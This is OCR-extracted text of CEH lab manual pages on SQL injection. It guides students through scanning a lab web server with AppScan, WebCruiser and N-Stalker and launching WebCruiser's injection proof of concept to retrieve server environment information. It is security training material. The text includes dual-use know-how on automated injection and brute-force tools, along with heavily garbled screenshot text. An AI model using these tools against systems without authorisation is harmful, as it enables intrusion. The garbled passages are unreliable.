  19. 19. M odule 1 4 - S Q L In jectio n FIG U RE 2.12: IBM Rational AppScau Scanning Web Application Result window TASK 2 A n a ly ze R esu lt 16. To analyze die scan results, click any of die results, such as to list all die links diat are vulnerable to SQL injection. £ I* •> P • .‫•־‬ SQL In jec tio n , ~.i 1 ‫ י‬J5L- s a p (^CS dtSItib 2 c0‫־‬M.1C i a•:‫■׳'זז‬ Oa :r •‫ד‬n1, M• p.j ■ ‫■ ־‬ . » ‫׳‬Cl- ‫י ״»״‬ , • t__ / The severity level assigned to any issue can be changed manually by rightclicking on die node. I 1 JcraierttmwliKrtcati • *tm* 0‫ז‬Clrtj1>h! 1 >i^n » tx r: M I*A > <y (ta I F IG U R E 2.13: IB M Rational AppScan Scanning Web Application Result window m Result Expert consists o f various modules that are used to process scan results. The processed results are added to the Issue Information tab of the Detail pane, making die information displayed there more comprehensive and detailed, including screen shots where relevant. 17. Click die A dviso ry ta b ol diat particular link. I* 111 die bottom pane ol die window to see the severity *— i**‫ ־‬I — b-r * • > *^I■ C^Afqt p SU[aM Vp! Wv twfdu ) w b lt ! ni a i 1n n . n f ^ ‫ך‬ £,•W ---- llfim‫״‬t--z~-----M I 4 fljas.*,* % — M , ^ rviUB.,.* ■ 1 >‫.ן‬ j ©& - ----,** ‫*״‬ * -‫״‬ 1 *,-^ .‫): ),״.׳.״״־‬ Tothnid Ootoiptor stivr. • nca T e M v » W5 S/sea»0k»sscc‫״‬un Tvjs0 c o < a ;• te e b ttv u t>lo> *o v h 1 >y a e e e n 1 ^ - O y ser!‫ ח‬e c o n Te h‫׳‬f*»e f tteise'tas apt( •snBias vsentntart ‫־‬O e 1 3 •asth p s w rd th SQ < e w e» 24 e a s o , e . n t/ ill Ict■ ________________________ o tttM «> J*g m The Security Report reports security issues found during the scan. Security information may be very extensive and can be filtered depending on your requirements. Six standard templates are included, but each can easily be tailored to include or exclude categories of information. ♦ HT * TF 5 r J7U «t F IG U R E Z14: IB M Rational AppScau Scanning Web Application Result window 18. To fix diese direats and vulnerabilities, click F ix a list of advice for fixing these vulnerabilities. [H• I*• ‫ס‬ R e co m m en d a tio n y p. j o to view e 0 (m < wU o <n9 '•jiUiauitllM ■ I74.'««f*ll» M V n lM< n p te 9 « 1 r .0 (V (U r««- V « n 1M 1»d v»» - 4 g f 0 0 “ ‫ י‬N alytoW k MF aJ.tM • ‫ "׳‬u iHM )« -W 3 p n e coretrjctifrat mte1 r re d s a £ u ™ « AITMTC B ‫( ״‬njbUJ E <‫״‬W3 B •tfOly Atttb ‫ יו‬Sow‫ ״‬C * vr uc l ( Se>wer mcnttnntjlrimttujt*bwdj»ccets 2 t u Kgu j x gP i ‫4«ו‬ayet ftf Oed3qt/r i hdi soj lmi n Ow f w ‫» ־‬nt» tc a*r O. ot p c ca c t * p f n at t 5wpnbaepuu.trertQnengnvu19nwxa11ao !‫ח‬g‫י‬to«ptctnt*aCtX epdta3d8«etJj.cl ‫־ ׳‬fcf •‫מ*א‬et 0scdtap iyjiw at » u!in n.* t y cw> o a t y » t 0 uK 1)snogf 3 -aoe'w‫;־‬ •vuou^ mpW Mea a Kipt nteaus uoces tre e r jmM i :0i rM eiM s. n o n t e e ew o Mn t k r H> *(n (clvci^u teo e1«k. F IG U R E 2.15: IB M Rational AppScan Scanning Web Application Result window C E H Lab Manual Page 799 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  20. 20. M odule 14 - S Q L In jectio n — T A S K 3 G e n e ra te R epo rt 19. After Rational AppScan assesses your site's vulnerability, you can generate customized reports configured for die various personnel 111 your organization. 20. You can open and view die reports from within Security AppScan, and you can s a v e a re p o rt as a file to be opened widi a tlurd-party application. 21. To generate a report, select T o o ls appears. -> R epo rt..., The C re a te R epo rt window m H ie Industry Standard Report reports the compliance (or noncompliance) o f your application with a selected industry committee or your own custom standards checklist. c a The Template Based Report is a custom report containing user-defined data and user-defined document formatting in Microsoft W ord .doc format. F IG U R E 2.16: IB M Rational AppScan Report Option window 22. Select die type of report to generate, check options, and click S ave R epo rt..., ‫1 *1־‬ wcurity S e J2 > ids r S a d r nu t y t n a d Rgltr C m l a e e u a o y o p i nc A D l aA a y s et n J i M ( r p a eB s d erit a e m The Delta Analysis report compares two sets o f scan results and shows the difference in U RLs and/or security issues discovered. m The Regulatory Compliance Report: It reports on the compliance (or non-compliance) o f your application with a large choice o f regulations or legal standards or with your own custom template). F IG U R E 2.17: IB M Rational AppScan Create Report window 23. Save die report to die desired location. The saved report will be helpful for future guidance. Lab Analysis Analyze and document the results related to the lab exercise. Give your opinion on your target’s security posture and exposure. C E H Lab Manual Page 800 Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  21. 21. M odule 14 - S Q L In jectio n Tool/Utility Information Collected/Objectives Achieved IBM Security AppScan PLE A SE TA LK TO ■ SQL Injection attack detected Y O U R IN S T R U C T O R IF Y O U R E L A T E D TO T H IS LAB. H A V E Q U E ST IO N S Questions 1. Analyze how to speed up die scanning process and reduce the number of pages that IBM Rational AppScan tinds. 2. Evaluate whether it is possible to perform scans against live production environments with IBM Rational AppScan. Will that cause damage or hurt the site? 3. Analvze how variables can be implemented 111 a multi-step sequence with IBM Rational AppScan. Internet Connection Required 0 Yes □ No Platform Supported □ !Labs C E H Lab Manual Page 801 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  22. 22. M odule 1 4 - S Q L In jectio n T e s t i n g for S Q L Injection U s i n g W e b C r u i s e r T o o l I C ON KEY / Valuable information WebCmiser - Web Vulnerability Scanner i an e f c i eand'powerfuln‫׳‬b s fetv e penetration t s i gto thatwillaidyou in auditingjourw b i e It has a e t n ol est. Vulnerability Scanner and a s r e of s c r t t os eis e u i y ol. Test your knowledge s Web exercise d G Workbook review Qfe Lab Scenario A deeper understanding of detecting SQL injection attacks using the IBM Security AppScan too was examined 111 the previous lab. 111 this lab we will have a look at a real case scenario where SQL injection attacks were implemented to steal confidential information from banks. Albert Gonzalez, an indicted hacker, stole 130 million credit and debit cards, the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on the companies' servers to intercept credit card data as it was being processed. He was charged for many different cases utilized were: 111 which the methods of hacking ■ Stmctured Query Language (“SQL”) was a computer programming language designed to retrieve and manage data on computer databases. ■ “SQL Injection Attacks” were methods of hacking into and gaining unauthorized access to computers connected to the Internet. ■ “SQL Injection Strings” were a series of instructions to computers used by hackers 111 furtherance of SQL Injection Attacks. ■ “Malware” was malicious computer software programmed to, among other diings, identity, store, and export information on computers that were hacked, including information such as credit and debit card numbers and corresponding personal identification information of cardholders (“Card Data”), as well as to evade detection by anti-virus programs running on those computers. As an expert s e c u rity p ro fe s s io n a l and p e n e tra tio n t e s t e r you should have a complete understanding of SQL injection attack scenarios and list high=risk C E H Lab Manual Page 802 Ethical Hacking and Countermeasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  23. 23. M odule 1 4 - S Q L In jectio n components and note entry points to start testing and exploring. Hence, as another aspect 111 SQL Injection testing, in tins lab you will be guided to test for SQL injection using the WebCruiser Tool. Lab Objectives & Too ls d e m o n s tra te d in The objective of tins kb is to help students learn how to test web applications for SQL injection direats and vulnerabilities. 111 tins kb, th is lab a re a v a ila b le D:CEHToo lsC E H v8 M o du le 14 SQL you will learn to: ■ Perform website scans for vulnerabilities ■ Analyze scanned results In je c tio n ■ Fix vulnerabilities 111 web applications ■ Generate reports for scanned web applications Lab Environment m You can download WebCruiser from http://sec4app.com/downl oad To earn‫ ־‬out die kb, you need: " W e b C ru iser located at D:CEH -ToolsC EHv8 M o du le 1 4 SQL ln jectio n S Q L In je c tio n D e te c tio n ToolsVW ebCruiser ■ Run tliis tool 111 Window Sender 2012 ■ You can also download the latest version of http:/ / sec4app.com/download.htm m W e b C ru is e r To produce timeconsuming SQ L sentence and get infom iation from ■ A web browser with Internet access die response time from the link ■ Microsoft .NET Framework Version 4.0 or later Lab Duration Time: 20 Minutes Overview of Testing Web Applications Web applications are tested for implementing security and automating vulnerabilitY assessments. Doing so prevents SQL injection attacks on web servers and web applications. Websites are tested for embedded malware and to employ multiple testing techniques. TASK 1 T e s tin g W eb A p p lica tio n Lab Tasks 1. To launch WebCnuser 111 your Windows Sen‫־‬er 2012 host machine, navigate to D :CEH -ToolsC EHv8 M o du le 1 4 SQL ln jec tio n S Q L In je c tio n D e te c tio n ToolsVWebCruiser. 2. Double-click W eb C ru iserW V S .e xe to launch it. C E H Lab Manual Page 803 Ethical Hacking and Countemieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  24. 24. M odule 1 4 - S Q L In jectio n _ WebCruiser - Web Vulnerability Scanner Enterprise Edition File Tools View Configuration J & t A & Browser □ X Help Scanner SQL (j>XSS d Resend L J Cootie fllta Repcrt © Setting & Scan Site | £ ‫ |נ‬Scan URL | GT E URL: - c .... I Wb ro s r uJ Re n e B we ee d I ₪V Jrorab S a n r lty c n e P C ro f OC n e O (F o f c c p SQ Lhecion ^ j O ^ ® St®S rip 0 * c tir A w nE ^ tfm raw nts S T /s*en 06 {- & R o n T o eccoJ iy=H Scanning is not necessary for S Q L Injection PO C , you can launch PO C by input the URL directly, or launch from the Scanner. WebCruiser support: * G ET/Post/Cookie Injection; * SQ L Server: Plai Text/FieldEcho(Unio n)/Blind Injection; * M ySQL/DB2/Access: FieldEcho(Union) /Blind Injection; * Oracle: FieldEcho(Union) /Blind/C rossSite Injection; h t t p : w w w .ia nu sec com H CootoeTool CodeTool -SbmgTtx •,* Setongs Repcrt ‫■׳‬ & W ebC ruise r - W e b V ulnerability Scanner h ttp :'‫׳‬sec4app.com http ; ‫'׳‬tw itte r .c o m ‫׳‬janusec £ Q fo ji 1 o 11 F IG U R E 3.1: WebCruiser niaiii window Enter die URL diat you want to scan; 111 tins lab we are scanning h ttp ://1 0 .0 .0 .2 /re a lh o m e / (dns IP address is where die realliome website is hosted). ‫ | ־ ־‬ar WebCruiser - Web Vulnerability Scanner Enterprise Edition File J 4j| ‫ט‬ WebCruiser Web Vulnerability Scanner for iO S, an effective and convenient web penetration testing tool diat w ill aid you in auditing your website! WebCruiser can find the following web vulnerabilities currently: * G E T SQ L Injection(Int, String, Search) * PO ST S Q L Injection(L t, String, Search) * Cross Site Scripti g(XSS) Tools View 0 Browser Configuration Scanner Help E l SQL (J>XSS r f Resend [ J Cookie Sic Report Setting U L h r'/'O .O^rM R : tlp O lhorre/ | I Wfc ro * r ,_ R o n « B w« ‫ ין‬o o d y Sa nr cne | U i Scan Site | La] Scan URL | GT E •SQO ^cbt J nk) r H 4 2 PX(Ftoof or Ccncep SQL ln»8crion 3 Q CosSteS n tir ; rs cp AOiw straionEntt S/sJenToo ^ -. r r f RcsotcTooJ CootoeTool CodeTool 1 - 0 | ‫* ך‬SlingTx =2 Settings }£ < <■ W ebC n use r - W e b V ulnerability Scanner http: sec I a p p .com http : ‫/־‬w w w ianusec com ‫־‬ h ttp .' tw itter .co m januscc Ldi | fiooJL 1 11 m It can support scanning website as well as PO C (Proof o f concept) for web vulnerabilities: S Q L Injection, Cross Site Scripting, X Pad i Injection etc. So, WebCruiser is also an automatic SQ L injection tool, an X Pad i injection tool, and a Cross Site Scripting tool! C E H Lab Manual Page 804 F IG U R E 3.2: WebCruiser Scanning a site 4. A software disclaimer pop-up will appear; click .OK to continue. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  25. 25. M odule 1 4 - S Q L In jectio n ‫ו ל ן‬ Confirm * Software Disclaimer: * Authorization must be obtained from the web application owner; * This program will try to get each link and post any data when scanning; * Backup the database before scanning so as to avoid disaster; * Using this software at your own risk. * Login as a legal user will help you find vulnerabilities to the most extent. * But not login is better if you intend to scan the login/authentication page. * Continue? OK m System Requirement: .N E T FrameWork V2.0 or higher, you can Download .N E T FrameWork V2.0 From Microsoft. Cancel F IG U R E 3.3: WebCruiser Software Disclaimer pop-up WebCnuser starts with die URL scan as shown in die following screenshot. It shows Site Stmcture, and die following table is vulnerabilities. WebCruiser - W eb Vulnerability Scanner Enterp-ise Edition File Tools View Configuration ! 9 Browser 2 URL: I S a g } R Help 3 SQL ^X SS Resend Cootie fjfio Report Setting http:V10.0.0.2/realhome/' : © WebBowser ‫־‬ H U S Q L injection is a code injection technique that exploits a security vulnerability occurring in the database layer o f an application. Scanner Vjlrcrabfit) Scanner P3C(Fro«< Of Ccncep SOL lnie< ?ion 9 O Stc Scnptir 1 I AOnrwtrabcn&ts ‫־‬ SyslenTooi t f ReacncTod ootaeTool^ CodeTool SUngTod Settwgj flSo Report < & 12 ^ Scan Site j GET Scan Current Site Scan Current URL Scan Multi-Site Reset/Clear Scanner Import ( 3 Scan URL » H (D Q Export [*query tpsyj ... DD_belotcdPNG_0 0.801‫* רווז‬j B ‫ ״‬Heal Hom e WebRM31rr# Jwd7d«U87Vtyn1 bWv;KDK>ArM‫3־‬RCS(bewioXwO^FaXP'ivRTkj1PbAWFf7hOM9u M7 WebResauce .«d Logn.aspx }‫■׳‬Index aspx ‫׳‬ H ‫׳‬Js jquery triggerjs ■ rcd*-«ld ]-[ « jqueiy.scrolTo-1.3 3 ^« I ©. w URL / Refer URL Para‫־‬ nete< http J f 0.0.0 2/realhome/Lcgm aspx' 31rton2=L>.. Tex!30x29‫־‬ O http7/10 0 0 2/Real Home/Loflin asox^Bjttor2=l Texltkw29‫־‬ <[ <r _ __ _ Stmg Stma KeyWord/Action URL fbat float Vulnerability POST SQL INJEC POST SQL INJEC II <‫־‬ Checking Form Vul: http//10.0.0.2/RealHome/property.aspx HTTP Thread: 4 1QQ The vulnerability is present when user input is either incorrectly filtered esLpe characters F IG U R E 3.4: WebCruiser Scanning Vulnerabilities 6. Right-click each of the vulnerabilities displayed 111 the scan result, and dien V ° U C a ll laUllcll SQL Illje C t lO ll POC (Proof of Concept). embedded in S Q L statements or user input is not strongly typed and thereby unexpectedly executed. C E H Lab Manual Page 805 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  26. 26. M odule 1 4 - S Q L In jectio n W e b C ru ise r ‫ ־‬W e b V u ln e ra b ility Scanner E n te rp rise E d itio n File J Tools J J LfU: View Configuration 0 Browser Q Scanner ViebBrowse' A in ef^ity Scanner POCPracr Of Corcep ; 3 SQ_ hjectbn Q Cross 5«e 5cnptn 1 J l AdnirwbationErtr SjstemTool h r f Resend’ ool ; S CookeToo _ CodeTool ‫ »&־‬StmgTod & r Setngs A Report S -< > 5 j ~JXSS 1 Resend E J Cookie yh, Report ^J Q Setting Q Scan Site | £ Scan URL http:// 13.0.012/realhome/ O It is ail instance o f a more general class o f vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQ L Injection is one o f the most common application layer attack techniques used today. Help | j *QL 1 @ GET s c a r Current Site Scan Current URL Scan Multi-Site Reset/Clear Scanner Import ‫ ״‬B O □ E>port j-jquery.ilpsy.js DD_belatedPNG_00.3a-mh js ~ 5 ReaiHome ■ 3 WbR s uc .a dd U Z y f1b hK 5 A-‫ ־‬r R 3 ow X K R X YR fc F A ^ h Miu k H v VV‫ ־‬c e eo r e x ? = 5 Wm c b c Dp |M3 D (b » o A )2 o p v T j1 b V 7 O 9 Og OiH OG !•■Web Resource.axd ‫־‬ I- Login aspx nefexaepx ; ‫־‬J S j-jauety.trigger.js | coda-«lider I‫ ״‬jqueor.scrollTo-1.3.3js URL / Rrfw URL Typ* v e w im Ohtlpj/IO.O.O.Z'RealHome/Looinaspx"Bjlt5n2«L . T©dB0*2«9 Snrq K*yWerd ,Action URI Vuh#rability Copy URL To ClipBoard SQL INJECTION POC Delete Vulnerability _A F IG U R E 3.5: WebCmiser SQ L Lijection PO C (Proof of Concept) 7. Tins will launch the SQL injection and till die relevant fields. Click G et E n viro nm en t In fo rm ation . W e b C ru ise r - W e b V u ln e ra b ility Scanner En te rp rise E d itio n File J fools 0 ±5 i i URL: '/1ew Configuration 0 Browser Q Scanner Help ffSQL j>XSS i i ’ Resend 2 Cookie Report Setting htt9://10.0.G.2'realhome/Login.aspx 0 Scan Site | POST Q Scan URL ‫ ״‬EJ I Q D Data !utt<n2=U{1tA_!V!1nTAROET=A_EVEJfrAROUNEJfr=A_VIEWSTATE=/wEPMMfTWK1l11m0»2FitkWu‫״‬F.T7«kkr2/je6z8jkyiIu*cE=«_EV'EH |> DataBase: UnKnown ▼ KeyWord: float . y :‫־‬ m Injection Type String ▼| Reset A*»nfe*y$e*rYW - ; Environment g l DataRa* ] □ Canmmd ] Q ] FfcR#*d‫״‬r J J ? H*Lpl6ad«f I ® Jtm gEneod#Of® Debug | POC<P‫־‬ ocf j Conccp a SGL hector Cress Sie Senptn ^ .idTwwfrabonEntr“ 2 — • E - © SrstsrrTcol I ^esendTool Q CoskeTocI CoieTool StmcTcol There are many methods to getting data in S Q L Injection, but not all these methods are supported in an actual penetration test. H fii ^eoort L @ About ! I Get Environment Information Get Environment Infomaticn HTTP Thread: 0 F IG U R E 3.6: WebCruiser SQ L Injection PO C Tool 8. It will display die environment information where die site is hosted. Lab Analysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s security‫ ־‬posture and exposure. Tool/Utility WebCruiser C E H Lab Manual Page 806 Information Collected/Objectives Achieved ■ SQL Injection Detected Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  27. 27. M odule 14 - S Q L In jectio n PL EASE T A L K T O YO UR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S L AB. Questions 1. Analyze how to speed up die scanning process and reduce die number of pages die IBM Rational AppScan finds. 2. Evaluate whether it is possible to perform scans against live production environments with IBM Rational AppScan. Will that cause damage or hurt the site? 3. Analyze how variables can be implemented 111 a multi-step sequence with IBM Rational AppScan. Internet Connection Required □ Yes □ No Platform Supported 0 Classroom C E H Lab Manual Page 807 0 1Labs Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  28. 28. M odule 1 4 - S Q L In jectio n T e s t i n g for S Q L Injection U s i n g N - Stalker T o o l I C ON KEY / Valuable information S Test your knowledge s Web exercise A ]-Stalker Web Application Security Scanner 2012 i a sop st at Web Security s hi ic ed Assessment s l t o foryour web a p i a i n . By incorporating t e well-known “ ouin plctos h NStealth H T T P Se ri Scanner” and i s39,000 Web Attack Signature database cu ty t along with a patent-pending component-oriented Web Application Se ri cu ty Assessment t c n l g , N-Stalker i a “ ehooy s must hare” s c r t t o t d v l p r , euiy o l o eeoes system/s c r t adm st to , IT a d t r , and s a f e u i y ini ra rs uios tf. Lab Scenario dGeWorkbook review Qf 111 the previous lab you examined how to use the Webcruiser tool to scan a website as well as POC (Proof O f Concept) for web vulnerabilities: SQL injection. Few attackers perform SQL injection attacks based on an “error message” received from the server. If an error is responded from the application, the attacker can determine the entire structure of the database, and read any value that can be read by the account the ASP application is using to connect to the SQL Server. However, 11 an error message is returned from the database server complaining that the SQL Query’s syntax is incorrect, an attacker tries all possible True and False questions through SQL statements to steal data. & Too ls d e m o n s tra te d in th is lab a re a v a ila b le D:CEH- As an expert s e c u rity p ro fe s s io n a l and p e n e tra tio n t e s t e r you should be familiar with the tips and tricks used 111 SQL injection detection. You must also be aware of all the tools that can be used to detect SQL injection flaws. 111 this lab you will learn to use the tool N-Stalker to detect SQL injection attacks 111 websites. T oo lsC E H v8 M o du le 14 SQL In je c tio n Lab Objectives The objective of tins lab is to help sUidents learn how to test web applications for SQL Injection threats and vulnerabilities. 111 diis lab, you will learn to: ■ Perform website scans for vulnerabilities C E H Lab Manual Page 808 Ethical Hacking and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.
  29. 29. M odule 14 - S Q L In jectio n ■ Analyze scanned results ■ Fix vulnerabilities 111 web applications ■ Generate reports for scanned web applications Lab Environment ca You can download NStalker from http://www.nstalker.com/ products/editions/free/do wnload To earn‫ ־‬out die lab, you need: ■ N -S ta lk e r located at D :CEH -ToolsC EHv8 M o du le 14 SQ L lnjectio n S Q L In je c tio n D e te c tio n T o o ls N -S ta lk e r W eb A p p lica tio n S e c u rity S c a n n e r ■ Run tliis tool 111 Window Server 2012 ■ You can also download the latest version of N -S ta lk e r from the link http://www.11stalker.com/products/editions/ free/download ■ A web browser with Internet access m Founded upon die U.S. Patent Registered Technology o f Component-oriented Web Application Security Scanning, N-Stalker Enterprise Edition allows for assessment o f Web Applications ■ Microsoft .NET Framework Version 4.0 or later Lab Duration Time: 20 Minutes Overview of Testing Web Applications Web applications are tested for implementing security and automating vulnerability assessments. Doing so prevents SQL injection attacks on web servers and web applications. Websites are tested for embedded malware and to employ multiple testing techniques. TASK 1 T e s tin g W eb A p p lica tio n Lab Tasks 1. To launch N-Stalker move your mouse cursor to die lower-left corner of your desktop and click S tart. m N-Stalker W eb Application Security Scanner 2012 Enterprise Edition provides the most complete and effective suite o f W eb Security assessment checks to enhance the overall security o f your W eb Applications against a wide range of vulnerabilities and sophisticated hacker attacks. C E H Lab Manual Page 809 Wos<r0Rc5Cda Ocn id Sfe22c*ea i t a cl nw v 1 t nde U ; ‫י יס י י^ז‬ F IG U R E 4.1: Windows Server 2012 Desktop view 2. Click die N -S ta lk e r F re e 2012 app to launch it. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  30. 30. M odule 1 4 - S Q L In jectio n Start A d m in is tra to r £ CcrrpUer Modb Firefox Google Chrome Command N-Stalker also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application’s SD LC , including die ability to control information exposure, development flaws, infrastructure issues and real security vulnerabilities that can be explored by external agents. T«i Manager *J m * Notepad+ o & '‫י ״ ״0 ״‬ !‫פ‬ i KOn*net.‫.״‬ Hyper V N Stalker Free2012 '<■ 91 W — F IG U R E 4.2: Windows Server 2012 Start menu Apps 3. Click die U p d a te button to update die N-Stalker database in die main window of N-Stalker as shown 111 die following screenshot. * «* -4 z & ‫־‬tf ■ a ‫״‬ -Stalker bouyM aK Src l er i ligt c o o t n ‫ט‬ W eb Security Intelligence Service (W SIS) is provided by W S I Labs and w ill ensure you always get the latest updates available for N-Stalker Web Application Security Scanner as well as for its attack signature database. N ew 0-day exploits and common vulnerabilities w ill be added on daily or weekly basis, giving you the ability to scan you W eb Server infrastructure periodically against the latest threats. F IG U R E 4.3: N-Stalker Main window 4. A software disclaimer pop-up will appear. Click O K to continue. ‫ך* ■־׳זי‬ N SfafcerWeb ° • ;£ £ £ £ * ‫ ז־‬r Gj MM IW O U O U K ^ - :6< - *» - ‫׳‬ • ** * Niun eoo - ir ‫״‬et nr N1dfSaihlmjwfitt*e nbb -ldpeau•d'rtLoadtns SkASsctfem c nwe« n U Ui.* ri ay mn n v c I t t t ae f ‫< ||י‬teCm!I fo cMjs _ puwmr•d i cjt »6«» o c t r o 0 c ‫׳‬ c Pn*V T HTJ0 t e5I O3- ) x 1 WW 0 —■ 1 Emda ma » m•ne o w • ot ( « 1 m ‫ . ג‬JF Kt eP•di n1 tJllt r r Eio • t -Stalker W‫ 1 »ג‬MIym5v• ill .»‫ ןן‬Hi * * i 1e System Requirement: .N E T FrameWork V2.0 or higher, you can Download .N E T FrameWork V2.0 From Microsoft. i M e t h e t 1 « 1 F IG U R E 4.4: N-Stalker Free Edition pop-up 5. C E H Lab Manual Page 810 N -S ta lk e r will start updating the database; it will take some time to update. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  31. 31. M odule 14 - S Q L In jectio n (MR OHM m toSecurity latclqotics same* *!*‫״‬T., 1 • 128MB R A M (available to N-Stalker) ‫״.,., ״ ״ ״‬ »n o» 3rxwtrPK*aw1wto *‫*י״‬ d CwW •A t least 500MB Hard Disk free space (caching purposes) 10IH H i IN K ■ ■ SWrt * B n <t 4 I“ - — ! - *— 1 INH j. b S***»V»,WNOr '!»»« IMH 0% 1 I •Win32 Platform (W in 2000, X P , 2003 or Vista and later) •Internet connection to download N-Stalker database/software updates N-Bt1lk«r PrM feanior E -Stalker To run N-Stalker W eb Application Security Scanner appropriately, there are minimum requirements to be met: F IG U R E 4.5: N-Stalker database updating status 6. After updating is complete, click S ta rt to start a new scanning session. ^ o - ‫ם‬ x -Stalker WbSc te U lk noSf « e euf r te ie c «v m You may modify NStalker's cache options to avoid web pages from being permanendy stored in }‫־‬ our hard disk. This might be useful to preserve disk space on large assessments C E H Lab Manual Page 811 F IG U R E 4.6: N-Stalker database updated 7. 111 N -S ta lk e r S ca n W izard, enter die URL as h ttp ://1 0 .0 .0 .2 /re a lh o m e / (tins IP address is where die realliome website is hosted). 8. Set die S can P o licy as OW ASP Policy, and click N ext. Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  32. 32. M odule 1 4 - S Q L In jectio n N-Stalker S nW ca izard Start W Application Security Scan Session eb ‫־‬m You m ust enter an URL and choose policy Scan Settings may be configured »r Web Application U L R m To run N-Stalker Scanner from command line, you w ill need a scan session policy that w ill contain policies, host information and specific configurations needed to run the entire session. [3 ] |http://1 0 .0.0.2/real1ome/ (E http://W w pte.tl'. https, w wtest U rt-alD .g: w .exam w V irectory.. etc) Choose Scan Policy | Choose URU Policy Optmze Settings j£l Load Scan Session Review Sum ary m - !31(Yumay toadscan settm Sfromprevousty saved scan lessens) o Q Start Scan Sesson Load Spider Data (Yum to sprier data fromprevcusiy saved scan sessions) o ay ad □ Use local cache from preveusly saved sesson (Avoid new web crawling) F IG U R E 4.7: N-Stalker Choosing U R L and Policy 9. Click .Y es 111 die UR I c a N-Stalker H T T P Brute Force tool does what the name says. It is an H T T P authentication brute force tool that works by taking a web macro and attempting to run a series o f authentication requests to obtain valid credentials (you may provide your own user and password list). R e stric tio n Found pop-up to continue. ---------- 3 URI Restriction Found You have provided the following page/directory pattern: [/realhome/] Do you want to restrict your scan to the above directory only? Yes (I No F IG U R E 4.8: N-Stalker U R I Restriction Found pop-up 10. 111 Optimize Settings, click N e x t to continue. N-Stalker S nW ca izard Start W Application Security Scan Session eb You m ust enter an URL and choose policy. Scan Settings may be configured Optimizing Settings |http://10.0.0.2/reatx)me/ (Yum choose toru a senes of tests toalowfor optm o ay n aation or cbckN tooontnue) ext m N-Stalker Web Proxy is a combination o f web proxy and H T T P inspection tool. It includes a full W eb Proxy support (for external browsers) along with an event-driven interception mechanism, that allows you to inspect H T T P communications (even SSL) based on keyword matching. Choose U L&Pobcy R O ize Results Authentication ptim Optimization Progress False Postive Engm e M iscellaneous Optimize Settings Review Sum ary m Start Scan Session Press ‫־‬Otim tooptim scan settrtg p ize" ize Optimization Results Avg Response |Scan Settings j Optimize Conn Failures ‫ ־‬Back Cancel N ‫ג‬ ext F IG U R E 4.9: N-Stalker Optimize Settings 11. Click Y e s in die O p tim ize C E H Lab Manual Page 812 S e ttin g s pop-up. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  33. 33. M odule 1 4 - S Q L In jectio n m S e t t in g s The term "G H D B " was allegedly coined by Johnny Long, which started to maintain a number of "google-based" queries that would eventually reveal security flaws in websites (without one having to scan the site directly for that vulnerability). N o t O p tim iz e d You haven't optimized your scan settings yet but we strongly recommend you to do that. Do you want to continue anyway? !....... Yes........1 No F IG U R E 4.10: N-Stalker pop-up 12. On die R e v ie w S u m m a ry tab, click S ta rt S ession to continue. X N-Stalker S nW ca izard Start W Application Security Scan Session eb You m ust enter an URL and choose policy. Scan Settings may be configured Review Summary m This is a string encoding tool which is useful to encode/decode data on multiple formats used by W eb Applications. |http://10.0.0.2/reaJhom e/ Scanning Settings Choose URL & PoScy Optmze Settings Review Summary Start Scan Sesson * •» • •» •» < * •» •» Scan Setting Host Inform ation Restricted Directory Policy N e am False-Positrve Settings New Server Dacovery Spider Engine H M Parser TL Server Technologies Alowed Hosts Value [10.0.0.2] Port: [80] SSL: [no] /reahome/ O A Policy W SP _ Enabled for M pie Extensions Enabled for 404 pages N uK ! Enabled (recommended ‫ מ‬most cases) M U Ls [500] M Per Node [30] M D [0 ax R ax ax epth ] JS [Execute/Parse] External JS [D JS Events [Execute eny] N /A N addtonal hosts configured o v P: Scan Settings « Back Cancel Start Session F IG U R E 4.11: N-Stalker Review Summary 13. The N -S ta lk e r continue. F re e Edition pop-up displays a message. Click OK to N-Stalker Free Edition ‫ט‬ This is a Web Server Discovery tool which w ill attempt to discover H T T P servers and fingerprint them to obtain their platform version. It might run based on a file list or IP range. N-Stalker Free Edition has a restriction to crawl only the first 500 pages within the same scan session. For more information about our Commercial Edition, please, contact us: E-mail: sales@nstalker.com Phone: +55-11-3675-7093 (GMT-0300) F IG U R E 4.12: N-Stalker Free Edition pop-up 14. Click S ta rt C E H Lab Manual Page 813 S can after completing die configuration of N-Stalker. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
